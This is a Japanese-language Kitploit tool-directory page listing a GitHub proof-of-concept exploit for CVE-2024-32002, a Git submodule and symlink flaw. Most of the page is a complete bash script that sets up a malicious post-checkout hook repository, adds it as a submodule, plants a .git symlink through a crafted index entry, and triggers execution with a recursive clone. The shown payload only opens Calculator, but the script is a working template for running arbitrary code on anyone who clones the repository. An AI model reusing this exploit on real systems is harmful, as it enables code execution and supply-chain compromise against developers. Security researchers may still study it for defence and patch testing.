Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-32002-Exploit — CVE-2024-32002の概念実証エクスプロイト。Gitサブモジュールの脆弱性で、巧妙に細工されたリポジトリとシンボリックリンクを介して任意のコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/bfengj/cve-2024-32002-exploit
ペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストサプライチェーンセキュリティレッドチーミング
GitHubbfengj/cve-2024-32002-exploit

CVE-2024-32002-Exploit

CVE-2024-32002の概念実証エクスプロイト。Gitサブモジュールの脆弱性で、巧妙に細工されたリポジトリとシンボリックリンクを介して任意のコード実行を可能にします。

リポジトリを見る
222年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
root@kitploit:~
#!/bin/bash

git init hook
cd hook
mkdir -p y/hooks
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
open -a Calculator.app
EOF


chmod +x y/hooks/post-checkout

git add y/hooks/post-checkout
git commit -m "post-checkout"
git remote add origin [email protected]:bfengj/CVE-2024-32002-hook.git
git push -u origin main

cd ..


git init exploit
cd exploit
git submodule add --name x/y [email protected]:bfengj/CVE-2024-32002-hook.git A/modules/x
git commit -m "add-submodule"

# 创建符号链接
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
git remote add origin [email protected]:bfengj/CVE-2024-32002-Exploit.git
git push -u origin main
cd ..

#测试
git clone --recursive [email protected]:bfengj/CVE-2024-32002-Exploit.git exploited
ツールをダウンロード